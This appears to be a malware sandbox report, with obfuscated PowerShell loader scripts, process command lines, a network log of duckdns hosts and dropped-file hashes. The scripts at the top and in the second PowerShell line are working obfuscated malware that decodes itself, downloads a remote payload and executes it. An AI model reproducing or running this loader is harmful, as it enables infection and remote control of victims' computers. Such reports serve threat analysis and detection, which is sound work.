ubSWreakyNon.as.unnetWereceFl gemK.ind. Vi eNInconeUncontUnshr. Hi,cWVrange plusb M.skCPrieslBick iClubbeOluffn prertRhode ');zabra (Alethoscope71 'Akva $In.viZWithbiThatcs ColikDiffea Tita.Lum,iH uffye pe,sa pild Bib eProtorWholesUimod[Li us$SocioD AsieiFacilsLicheaJ ssicSpyttc SemihKom aacogwar Spili .ensd MollaHumilsSyndeeEkste] Nonl=odont$kompoEIsoninTagale,meriaLacemnRefunp,lectaNoncorM llotLigemsSkntrhBogklaJalouvFooteeAlterrForstnSikkeeDitzssV,lla ');$Bronchitic=Alethoscope71 ' GrovZBlackiStoolsHe stkAffa.aTheat. grnsDExspooForhawAilannCoupllV teroBiporaScorid,tomaFUnridiproc.lp osleChris( Bout$ rillGSkammeAutornSalignDiscoeBjergmgrandb fo,tlModviaAfkoldmyth eAnfrbsAudie,Gipsb$IntonSDickipTeariaM trotBootpcAfmyth M.ttc Skrio W aicA,bifkblitz5 Serv9F.urn)Laser ';$Bronchitic=$Grundmurenes[1]+$Bronchitic;$Spatchcock59=$Grundmurenes[0];zabra (Alethoscope71 'Rots.$Helbrg Alsil Ove,o highbSkovlaPneumlFleur:JurisIWallsn,entes OpkaeSk,bmcGasrat St miBlybacPederiSynkrdambl,e Naba=Unbod(Bill,Tflosse.nucksNormatS ffi- fortPMisusa I.ddt NedshLovre Cryp$RaciaSHjemmpRenalaGenn.tTildicNetvrh.ragtcUngluoF.rfucValgfkO erp5K pec9,onde)troll ');while (!$Insecticide) {zabra (Alethoscope71 'Natti$HowbegDrainlAntifo A trbErranaMudlal ogu:SemipDCumuleOriensCobe.a DatavJenskoRealkuDundeevinkorForsaiFedernUrceogPigede .midrBek e=Pancr$ Tr,mtAfm trBo.bouAdulte aver ') ;zabra $Bronchitic;zabra (Alethoscope71 'BarriSGenictKlokkaKonger.ndskt Cann- SkydSPar,ilP kleeendetePyn epbebyr Inval4,even ');zabra (Alethoscope71 ' Sigj$GarangMinimlDe onoTnkelb SheoaClunilKarnf:redisIHeartnSl ntsNedskeUncencSign.tArmodiFagkycChalciCeratdSol ee Out =Efter( agneTe traedokumsslurrthenty-Clot,PSixmoa SenotguayahMind. Waggo$U.ennSSamm.pAfs,aaBeln tPoticcSiderhTenorc Jv,doF rehc DebikUnali5Elysi9 Cut )urost ') ;zabra (Alethoscope71 ' Re.r$Indbyg FordlPlejeoStra bSubpaaAutoml Kloe: Da.sT udseiUdty lBlackoBekymrDis rd Zinkn Cry,e sej r,yrre=Ortho$ Ch,sgPejlelReso,oL irsbrekuraIchthl Epim: JellB LittaCrabbrElgt,sCalloeRkenvlVesicsA.vorf EgeteDeklibFreckePa.opr lomeAntidnKa nfsAppri+Mispr+Markh%Tekst$KaadmFRicheoChaenr Mod.uLimonrLovf,epasfonBetraeMicr.nYdelsdSupereNipsg.SprawcWau hoUn.esuPtpconAfladtVisar ') ;$Gennemblades=$Forurenende[$Tilordner];}$Skandinaviensrejses=322661;$Thirlages=28492;zabra (Alethoscope71 'Suf l$Br.dygVe nulvagtsolysebb enoaIndstl nons:FagspB Lig l a,atl LerseSaledh AwheaHa,ket SelftSpagne ejrsnTeksteVa,visOntic1Afdel1Spoon2,pith Adjus=k.nce ForstG AfhoePers,tSvir.-B.edeCKarakoVortin KulttNow,seGi.nenFritntKlode Ident$Ta,waS.utodpPasseaHy letC,chlcHorolhtossecSalitoS.ckecOncogkJoz.t5Filla9 Skue ');zabra (Alethoscope71 ' gal $ThumbgFremslPurrioDeallbA.ayraB.fiplTersh:RadioDLa,ahiNon.ra,ndgigCeleboNorm,nU fsliPickwa.nthrlDrnud cutic=Prekr s,il[J rypSAfklay Tur,s krumtE.peceStendmFer,i.TelefC .freoKonson DodevTeglveReassrScaputCeleb]cit,u:Servo:MissiFRetorrTota,oDesmomkanflBDeriva Exp.sEudioePtole6S lia4 MokkS PlastUsa,drSelskiVandrn TuyegA,chc(Short$KlageB EnkelEjendl Fa teUn.lah LifeaasmintLitzytT asseClearnSto.deSamfusOxidi1 Sasa1Ho,er2Sa,ro)iodin ');zabra (Alethoscope71 ' .pid$AutorgOcea.lAk.ioo vintbT,deraBeb,tl rahm:SprinN IndeaBadehtI,plauPrebrr Kvi,fBefalr Han.e BrnddSimrenFi,mkiKraten iligg Br dsFoste Kab n=Recep fre m[fasefSFlintynit,nsEvangt Forse RevymBytte.GastrTPositeP.lerx D,ejtBests.LaminEFremsn Unm,cSe,teoFeme.dTypoliOuttrnTordig Vach]Outwa:Skovl:EnsluAI,serSSuperCReassIAlsidIiskol.flereGGalvae Sh,utImmunSP,iretStjdmrSlagtiC ntanOpiumgJann,( Bell$ DeriD SuttiI.conaJuntagS.ovsov rianPre ci befsaOutkilUnree)Tcha, ');zabra (Alethoscope71 'Inven$B.elagTempelrussioPhacobUntemaSelvblGlory:HardbSBowshc ForsuChemitRemuluA,kohl Seksaranie=Disas$SemipNRepada Mar.tBibelu F rmr ThyrfBritir.rimreIs.eldUgyldnAn.rkiKer tn Unimg.etodsFdeva. SporsDazaeuPha ib C.thsToxaet M elrNonriiLaesenxylopg.efec( Rigs$ AgreSEjerskBefola Tes.nRundkd LisciSur,enFordjaInterv tilii Spile EksanA ades Ku,trSti,ce,edbrjEcurisDdsn.e TransUnder,Borde$Jami,T kapihSaloniKowtor dew,lEquivaSulevg quire S.avs Deci)primf ');zabra $Scutula;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Perennate = 1;$Skvatmiklernes='Sub';$Skvatmiklernes+='strin';$Skvatmiklernes+='g';Function Brandstiftelsers($staalwirer){$Stivedes49=$staalwirer.Length-$Perennate;For($Maltet=5;$Maltet -lt $Stivedes49;$Maltet+=6){$Vizor137+=$staalwirer.$Skvatmiklernes.Invoke( $Maltet, $Perennate);}$Vizor137;}function Hjemvisendes($Vasili){& ($Dispersonalise) ($Vasili);}$pseudoasymmetric=Brandstiftelsers ' UdpiMAmbitoSoleazStrepiPtyall ataplPlyboaNonbl/.atti5hjdep.Absal0Sprut Hills(CoincW FuksiTopoanTabled A,unoA.trawCh,uvsFelt. ordeNEl kvT Amag Retab1Diver0Boyko.Helio0Passe;Refer mad,pW yhediQueernDejk 6Som,e4Konk ;Flint Loopex Noni6milie4Aulae;Alts. AmmunrSc,riv Lath:Ditte1zy ne2tr mn1Lampm.Ra io0Rate.)Sving ConjuGG,oteeObtencMedarkA.diloHalvk/Aup k2K mfu0Fugti1Frugo0Incol0tyres1 Gran0Oppos1Reali Fa kyFMalfeiSe.onrJu ole efugf uumoDownyx Me.r/Moleh1 ,agi2Hepat1Bahan..valt0Na.io ';$Cordwood=Brandstiftelsers 'To.teUBlgelsOverweSkol ranalo-Pre,oARiddegCripseMo oanRedigtAffek ';$Efterregningerne=Brandstiftelsers ' RegehPlanftV,lgbtSynkrpPre tsIn el:A.tog/Ident/OvergjFareso Co,hcCountcFah euside.pHotroaprodut OveriMa.choOverrnKo.keaVr,tjlOvercs.inercVerediEf ereNereinHftelcKvindeBilip.InkmaoSubsir Ud,rgLongb/Underzy dliaadre.r Tek aPjalt/PteryB E.curSerpeaRemani UnconRe rosScandtUn opo F,llr VitimCol,miApostnTumorgArtebeVermir,imbo.TottesAppromPuppyiafgiv ';$Gyroceras=Brandstiftelsers 'Naad >Slvbr ';$Dispersonalise=Brandstiftelsers 'ForeliFamiletrajexBorte ';$Blackbine28='Clamminesses';$Bedazzlingly = Brandstiftelsers 'All.gearth.cSic lhIn,raoA,non Epikk%Rundba IntepSlavepTilstd.dskraSpermtRe tra nona%Tresi\Calo.F Ude r Iljie TrandKentrsTakstaKof,ef Ho,ot VildaPalmalK.itie D,esrazule. O gaHInspioAntiflKapel majes&Hepar&Iwear Tet,neRuskuc Lokah UdfooFulmi Ju,ot Bon, ';Hjemvisendes (Brandstiftelsers 'Hagli$afsidgAntiplnonreo nemob Did,aEfterlUfore:EnmesSTilliy CollnOver aSupersSti.tcTin ei omidL.quei Rak.aEnspneDesul= .ilt(DuftecUnfi,mbomb dsid,l Bruge/ xcecGr di D,bbi$Hva.fB ,alleJekasd UnstaTurnpz alizHu.enlTidsviAntisnUnvo gPhagolCabbay Omad).utfo ');Hjemvisendes (Brandstiftelsers ' .atn$Obst gSejlglSoo,loAnskubKraneaLenielArres:RampoBTheirrOvermeFo.frvLkus.oI.trorGenerd Mordn Diske Hjl.rTilbenTrapmeForkosStorj= Ea i$SuperEPrizefhomeotVasaeeFllesr BorarB ptieStnkeg anfonmetaliAbonnnVvstygSemideGrun rStellnExcore opim..ntersOpsigp Eparl ,ubsiRespitDiagn(Va.co$BortfG eculy FormrOp.rao ZoomcId,toeOmbrorB.speado,insKomp.)Condo ');$Efterregningerne=$Brevordnernes[0];$Audubon= (Brandstiftelsers 'N,nep$ ChargGymn.l ubcooTastebIsmebaUnpralCa,ou:TopnoUGoldwdBlomsvLn,delOverzgDishtnFeeliiBitrynTtningUnalls.amme= VagtNCompletovaswPrede- Und,OhuldsbDioxijPremee ShipcIsobitDeobs EtapeSB igayBr,sls ,lletYnksoeLatenmrenum. KamaNLb,nseSakertOvere.LengtW.pspreJordebB ebrCambiglMala.iBoan.eTabtanIntert');$Audubon+=$Synascidiae[1];Hjemvisendes ($Audubon);Hjemvisendes (Brandstiftelsers 'Recep$BethiU ArredKonsuvToaarlPros.gNdtvunLeiseiwit.dnAlenegPrefesGonad.DkninHIn.erehelseaOmmesdMattee,ogstr Prersstrif[Rout.$Dis.oCUnderoT,wnirUformd Ordfw,orkroVarmeoRobotdK,nfi]Bligh=Prowl$Mastupst.ycsAssaieOptimuAdoledForbioC.bicaAdgansIn.alySkrunm .chimUg,bleRuedetK.imar,nnedi Qua.c Iber ');$Totting=Brandstiftelsers 'Anst $decohUfinerdEudaevAn imlme.legD.tomnCuculiPicron Bu,ng UndesMinis.senatDSapono KultwArbejn AkkrlSon,so ArneaEskapd LagoFTrafii MeatlNephreHemip(Anbe.$ParisESne efVouchtcockne rou r Kapsr PrineTek tg lyvn QuiniSheennRhodogUbalaeVakuurStamknM sereCu ti,unexc$DisperLugerebaculb Bev.omonotp.erves evrt)Gedem ';$rebops=$Synascidiae[0];Hjemvisendes (Brandstiftelsers 'Surds$ExistgCabaslSpinooAmie bSanera VisilT.lme:NonloUAdaminM.ximr,ikameS.lutpNulteuSproglU dglsCyliniStykvn Gr ugPseud=Depen(FlyveTBondee,redsspagajt,zonl-GreybPMeetiaIntimtOmrinhH.ste Nonav$V kelr tyrae.iplib InstoInvespSpaansIsosp)Morbr ');while (!$Unrepulsing) {Hjemvisendes (Brandstiftelsers 'Sp tk$ Taleg Chi,lE.kimoSa,ebb He,ra Edd l Trew:OplanCChe.koFiskeuAmatrn F.emtBilleeR.klirTotalpEngolrChe.roSpr.egHisparKeramaListemSka.tmOutstiopfinn Bangg api=Paddl$UdsprtGimper HydruN.taaeWalla ') ;Hjemvisendes $Totting;Hjemvisendes (Brandstiftelsers 'CreasSTestkt DermaCasser Hidst Alde-Intr,S Sal lCou.teLuaneeAar,gpRelat Fitif4Whack ');Hjemvisendes (Brandstiftelsers 'Dyren$Impi,g HortlForeboBa,kbbSharpaUnde.l moti:Apho Ukikkenkon.orSerrae LopopTapiouStiftl CompsoverfivelsennonplgFlers=No po(RkkeuTSwardeBarbas N nct,elco- .orbPGenstaSem.etTuberhSprjt Tids.$ObverrSkumgeTyronbBushio MercpV.brasN.nsh)Sk.be ') ;Hjemvisendes (Brandstiftelsers 'slute$Bel.rgSkotjlInsecoBehalb.erosaNonanl Klav:BorsjFOve,fu Splkn Sy,ddTur ie.umpir,roth2Ne ju1Tilla6Attri=Jepmi$Ud.ybgU,intlPlatio selebGrusnaFa.talUnde,:Jo,geUFyrvrnSpareiMu,timM ngfb.orpuuenbuseUs,ledAttri+ Sjo,+N.dis% Cine$TormeB irkur ,uppeTrumfvMaleeo BondrStemndKa elnTeknieBeskyrFortonmosseeVa gtsB nrf. onodcGalvaoRodenuInstanProd.tSwand ') ;$Efterregningerne=$Brevordnernes[$Funder216];}$Yowed=340534;$Epiteternes=29321;Hjemvisendes (Brandstiftelsers 'Nons $ ChargHo edlMonoso BlvrbSkrapaNedsil Mode: U.thZUnp,riSkovmgApprog unp iDisafePragtsMaxif2hov d1Ssyge3Grand yoyo=Ka.ar ,seudG C.ameNoncot Bing-Of.enCEn.meoCh.fenBris.tStinteswe,pnSe skt Isop N.nre$Doorkr MonoeCalifb K fioFrou.pH.ppos Slu ');Hjemvisendes (Brandstiftelsers 'Ha,ps$ StumgPluralK ediobe.chbVerboaHa vflPseud:Samm,KOplagoSalgsmAna omRecreu gunnnSex geP.rroppecunlHardwaStenvnAlaba Enski= O,er Bron[DespeSBraggyKa.mesruffitFodboe .ndemSma l.StyreCFortoo.aysenRorshvSkytteOversrHaandtShas.]Lycop:Gauch:InitiFUdsperR,nteo CaudmTe.usBVirkeaDefe,sPhycie K ng6 Ana.4Vo.umSSumertA.ularc lipiNitignmarkpgDe.in(S.rik$Fr teZBons,iHa,big K,lkgVotiviSnirkeD.ssisSmer.2 S.ec1Kitni3Ge st),okul ');Hjemvisendes (Brandstiftelsers 'Samme$InclugWi.til NonsoAccurbByggeaTu,anl dent: noncIDecenn HilltIsogriFinanmRomantN.rve Enjoi=Julea Fo,ra[SeguiSH.gtbyOvergsHardwtSdruceMetapmCount.GldetTTilree Dim,xDepigtNapht.SporvENumernFyldpc Rejso Dekrd st ri onnin WaybgOverh]Rek l: Ud.i:GuineABib,iSF.ddlC Go.hISpo eI In,e.k.lofGSkumreMikrotmuci S ModetNonp,rGarroiA.surn Ja.kgRatio(Taalm$ ExacKAfk eoUreelmErhv.mIntimuBacksn UncoeFlyvepD sorlSpulea isnin,abri) Koni ');Hjemvisendes (Brandstiftelsers ' ango$Bef igTurbilSky.toLejrpb.agneaP.edelpr hu:CompaTParoxoImporeSnksmrbekmprRest,eDrabbdUps,oePoint= rubi$NonsiImeni,nGr,sgtVi.nnikompemUdh,ltTyph .mischs Miliu ForbbSym,osLen,et.wistr,agadiOctocnKultugNedst(Doubl$unnecYl,skeoEm,rowIldsjeElecidFuld., Bl d$ udgeEDunnepMemori DeprtchiroeFilsytSamleeQuottrF lkfnSoc ae ,mvisMottl)Au,ik ');Hjemvisendes $Toerrede;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fredsaftaler.Hol && echo t"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtastningernes.Voi && echo t"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\isolinolenic.Ove && echo $"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fredsaftaler.Hol && echo t"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\isolinolenic.Ove && echo $"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	8.8.8.8.in-addr.arpa	udp
US	8.8.8.8:53	232.168.11.51.in-addr.arpa	udp
US	8.8.8.8:53	107.211.222.173.in-addr.arpa	udp
US	8.8.8.8:53	2.159.190.20.in-addr.arpa	udp
US	8.8.8.8:53	157.123.68.40.in-addr.arpa	udp
US	8.8.8.8:53	206.23.85.13.in-addr.arpa	udp
US	8.8.8.8:53	mayxw9402.duckdns.org	udp
US	12.221.146.138:9402	mayxw9402.duckdns.org	tcp
US	8.8.8.8:53	138.146.221.12.in-addr.arpa	udp
US	8.8.8.8:53	joccupationalscience.org	udp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	8.8.8.8:53	17.154.184.185.in-addr.arpa	udp
US	8.8.8.8:53	tatselectronics.co.zw	udp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	8.8.8.8:53	218.125.244.207.in-addr.arpa	udp
US	8.8.8.8:53	91.90.14.23.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	204.79.197.200:443	tse1.mm.bing.net	tcp
US	204.79.197.200:443	tse1.mm.bing.net	tcp
US	204.79.197.200:443	tse1.mm.bing.net	tcp
US	204.79.197.200:443	tse1.mm.bing.net	tcp
US	8.8.8.8:53	73.159.190.20.in-addr.arpa	udp
US	8.8.8.8:53	88.156.103.20.in-addr.arpa	udp
US	8.8.8.8:53	200.197.79.204.in-addr.arpa	udp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	8.8.8.8:53	11.97.55.23.in-addr.arpa	udp
US	8.8.8.8:53	171.101.63.23.in-addr.arpa	udp
US	8.8.8.8:53	xwormay9090.duckdns.org	udp
FR	135.125.27.227:9090	xwormay9090.duckdns.org	tcp
US	8.8.8.8:53	227.27.125.135.in-addr.arpa	udp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	8.8.8.8:53	172.210.232.199.in-addr.arpa	udp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	8.8.8.8:53	www.sendspace.com	udp
US	104.21.28.80:443	www.sendspace.com	tcp
US	8.8.8.8:53	fs13n5.sendspace.com	udp
CA	69.31.136.57:443	fs13n5.sendspace.com	tcp
US	8.8.8.8:53	crt.sectigo.com	udp
US	104.18.38.233:80	crt.sectigo.com	tcp
US	8.8.8.8:53	80.28.21.104.in-addr.arpa	udp
US	8.8.8.8:53	57.136.31.69.in-addr.arpa	udp
US	8.8.8.8:53	233.38.18.104.in-addr.arpa	udp
US	8.8.8.8:53	g.bing.com	udp
US	204.79.197.237:443	g.bing.com	tcp
NL	23.62.61.97:443	www.bing.com	tcp
US	8.8.8.8:53	hvnmay8500.duckdns.org	udp
US	12.221.146.138:8500	hvnmay8500.duckdns.org	tcp
US	8.8.8.8:53	237.197.79.204.in-addr.arpa	udp
US	8.8.8.8:53	97.61.62.23.in-addr.arpa	udp
NL	23.62.61.97:443	www.bing.com	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	8.8.8.8:53	123.10.44.20.in-addr.arpa	udp

Files

memory/4952-0-0x0000000000290000-0x00000000002A0000-memory.dmp

memory/4952-1-0x00007FFB16103000-0x00007FFB16105000-memory.dmp

memory/4952-6-0x00007FFB16100000-0x00007FFB16BC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aevjqb.vbe

MD5	f1d487d507b6b841db8b7b72bd9ee442
SHA1	8be4ecbd352ea9717b73cda28108a5a72f1e28b7
SHA256	0026871fae17c91b3441af1af102d8867ddd3ca3f0ddf5cbb53be6ddf53de290
SHA512	91b8a1399b92c4258cfa6ce27a68723a19352012c5532cdb3273305f7fa3b3a238359c1a6264472f5cae437edc7afc7745d22e1ade09e04d7ebf5847c553331e

memory/1420-10-0x00000249FDE20000-0x00000249FDE42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ozezfeta.hfy.ps1

MD5	d17fe0a3f47be24a6453e9ef58c94641
SHA1	6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256	96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512	5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\mewops.vbe

MD5	dbe5866bb55d72813066600716474395
SHA1	671ddef8c1f04b8981e808f8c64233c89c8ed7fd
SHA256	46c622b14a31028da2b382e2676f47992f5384693aa3638165dcb02454fb5ef7
SHA512	b40c2fd0d7fec197b41801624d4e6de7b376838fcd792abc82ea8c385d7443be73728e92cbba55dbfca2baafdf13b6b585f7c498e0b2af782dd8fdc377574abf

memory/4952-23-0x00007FFB16100000-0x00007FFB16BC1000-memory.dmp

memory/4852-35-0x0000000002DA0000-0x0000000002DD6000-memory.dmp

memory/4852-36-0x0000000005760000-0x0000000005D88000-memory.dmp

memory/4852-37-0x0000000005700000-0x0000000005722000-memory.dmp

memory/4852-38-0x0000000005FC0000-0x0000000006026000-memory.dmp

memory/4852-39-0x0000000006030000-0x0000000006096000-memory.dmp

memory/4852-49-0x00000000060A0000-0x00000000063F4000-memory.dmp

memory/4852-50-0x00000000066A0000-0x00000000066BE000-memory.dmp

memory/4852-51-0x00000000066E0000-0x000000000672C000-memory.dmp

memory/4852-53-0x0000000007F50000-0x00000000085CA000-memory.dmp

memory/4852-54-0x0000000006C10000-0x0000000006C2A000-memory.dmp

memory/4852-55-0x0000000007970000-0x0000000007A06000-memory.dmp

memory/4852-56-0x0000000007900000-0x0000000007922000-memory.dmp

memory/4852-57-0x0000000008B80000-0x0000000009124000-memory.dmp

C:\Users\Admin\AppData\Roaming\Sorbet.Unb

MD5	1c3f2054bb5bc90f98bcc6be6f0eca04
SHA1	8c2b8b87cca9b76fd64523746d202024082498ce
SHA256	8ff469d50c3017539faed1d5ee3d1adb9cd13aeabee0a3eccfed3b2a3d632d34
SHA512	c00cb6396adaa2a44212d1c3b7f654fde4eeb82e10883439ce4e16447ed1d5b8b654adb59d8913ee0acfe4b5d1be2583a383fe9cb14dc14d97845b73d378c119

memory/4852-69-0x0000000009130000-0x000000000BDFE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Indtastningernes.Voi

MD5	b2cfc3953c18131bd516f8d98b3b160a
SHA1	c80d15ea3dbc080c42ad0f57c1ffcc8fb4592776
SHA256	0618f3348168e845c6ee63628cc1ca4a74fc409af9fae6d63785babae682e678
SHA512	7f9bf761938cbdecd0636cc9074e0d4018556cca126ef780ee0fd5da4ff8f585c3e2dba2723474f2742d0bf6a3bb165d7beef80593e847edfcdbec6fbb7e1dd3

memory/3196-71-0x0000000008C10000-0x000000000C2D3000-memory.dmp

memory/1880-79-0x00000000010B0000-0x0000000002304000-memory.dmp

memory/1880-80-0x00000000010B0000-0x00000000010BE000-memory.dmp

memory/1880-81-0x0000000023170000-0x000000002320C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5	d4d8cef58818612769a698c291ca3b37
SHA1	54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256	98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512	f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

memory/1880-86-0x0000000023530000-0x00000000235C2000-memory.dmp

memory/1880-87-0x00000000234A0000-0x00000000234AA000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5	d7654309f30b2ad540d969a6660bd139
SHA1	c1927c10ca01b8c16f0c5fb21bfd5dd1fb7b7354
SHA256	4c451169eb96d2dd22b50836527c3f905a9706fa7ccec239d33167ccd6d98e94
SHA512	7c9cd1f9b6e2f2c722dd56d1efc7a5347a4ada2071864032aff45548fcc1950b36aeb55b8f82ecd29b7d076bf19a39f1aaadd604c30a03fbf12b48a7c2b1dd0e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5	822467b728b7a66b081c91795373789a
SHA1	d8f2f02e1eef62485a9feffd59ce837511749865
SHA256	af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512	bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\Local\Temp\zcbvbq.vbs

MD5	6cac0e7d6c077af15d8a5b969cfd6d4b
SHA1	4374c6079397cb524f758997567b4a64f550f7d4
SHA256	ac4f3511c547080a1539a9209a75d6a1e7ceaf2b531b5d0c8aa0dd4b7c11b541
SHA512	e00389de322a538507413cada7b1e536f8fec3680e264c50133b6ca07f63e97741bc8a4daa8e8bfa884df7dbdc14e7daddc253ba792c93563b3dd0b3bef4beb8

memory/3520-99-0x0000000001090000-0x0000000001104000-memory.dmp

memory/3520-98-0x0000000001090000-0x00000000022E4000-memory.dmp

memory/3520-100-0x0000000022BA0000-0x0000000022C7C000-memory.dmp

memory/3520-152-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-158-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-156-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-154-0x0000000022BA0000-0x0000000022C77000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5	556084f2c6d459c116a69d6fedcc4105
SHA1	633e89b9a1e77942d822d14de6708430a3944dbc
SHA256	88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512	0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5	bcc3b000e0853aa46e181955a9f9af8e
SHA1	268edcaff5c49d22f138c628af96ed76cd0d716e
SHA256	7a839c70b7fa7713927122497092649e711e36045e3198a43d9e9414aaf4ecf3
SHA512	8d90a993c1dab72cc53c4c0d88acdcf33652445ab0a00667e460bbb361d24e01be9d39c2d9d5473c5564abafbcbf664958cf4bd2c63668edcdc730d0cffe1554

memory/3520-150-0x0000000022BA0000-0x0000000022C77000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oxtyxn.vbe

MD5	61459795ee4e553ab8dddab602bf3af8
SHA1	2f4ec4ab0084c2925fb0534a3039d04c41aaaa7d
SHA256	bf20095d0508ce92f865b86cb8282b63d21844f4634d6e05d2dc49e69af27c15
SHA512	614f3303c69e7d22b117138611beedea2c69308c829ac91d7608caeaef564a8a64ffe05097637d8234af97350e1d644f641cd53f2d4ed96f1321969598d27d1f

memory/3520-148-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-146-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-144-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-142-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-138-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-136-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-134-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-132-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-130-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-128-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-126-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-124-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-122-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-118-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-116-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-114-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-112-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-110-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-108-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-106-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-102-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-101-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-140-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-120-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/3520-104-0x0000000022BA0000-0x0000000022C77000-memory.dmp

memory/4852-6382-0x0000000006130000-0x0000000006484000-memory.dmp

memory/4852-6411-0x00000000067C0000-0x000000000680C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Fredsaftaler.Hol

MD5	27c4b8c6fcd86b087038197e9ba10c7c
SHA1	a39cad898a6b0e7af265075dba053f51ce401111
SHA256	76c2e3c8bebf19422fd115452d6038b54ba40a20b3cf77d073e7b1d297b1b0f1
SHA512	5aed8dfd8c336e82da0341159dfab233c157d7d052bb84cc00c8e8c7bbce02beb282712a1c2200c86540d03b236d0b78289714237c367b3b57eff9059ce51208

C:\Users\Admin\AppData\Roaming\isolinolenic.Ove

MD5	4e84ffd0da23788c462196b8a18a41d8
SHA1	47df1cc934fd33537e5ebc1d5b22c17416942fcb
SHA256	756eea271be2cd1129a843b75704228e8cfca9c088f99aa5be5840e1e5f46af2
SHA512	f975d5de5083d0999f632b090aff29e02440323da19ec56c3cf405c76b18c2167167bda12b74b8e8b8aad30bf7de85a9e33d2794a1924074907fd2ac0ef78d76

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4B33FB012A2D26607E54B30B4788C864

MD5	b7c087baa58368ce27e6a0de583f337d
SHA1	5de42f02076f90f6d426c3c664f50f3c73dc5d11
SHA256	ec1a1a5bf85e6fbc20fc4ef2a8137bbc558924afdd917e26f386c2deb9d02477
SHA512	7376c5513458604d6b9cbb8a861ab7d85cb3d5c66cd0d7feb47b5b99e100b07a9dbd7fce9c67e32ed4e1a77374fdedce315f960bf0a0b0b7e77fa1eac19152e5

